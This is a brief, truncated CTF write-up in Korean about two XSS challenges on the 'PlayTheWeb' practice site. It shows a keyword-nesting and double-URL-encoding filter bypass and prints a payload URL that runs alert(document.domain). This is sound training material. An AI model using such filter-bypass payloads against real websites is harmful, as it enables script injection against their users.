XSS
-
[PlayTheWeb] XSSCTF write_up/기타 CTF 2019. 9. 18. 11:31
1번문제 입니다. http://ptw.alonalab.kr/ctf/xss1.php 파라미터인 answer을 이용해서 를 입력하면 되는 것 같습니다. ?answer= 를 입력해 보겠습니다. script와 /가 필터링 되고 있네요 script -> scrscriptipt || / -> %252f 로 변환해서 입력해 보겠습니다. http://ptw.alonalab.kr/ctf/xss1.php?answer=%3Cscrscriptipt%3Ealert(document.domain)%3C%252fscrscriptipt%3E 2번 문제 입니다. http://ptw.alonalab.kr/ctf/KcmPU.php http://ptw.alonalab.kr/ctf/KcmPU.php?answer=%3Cscrscriptipt%3..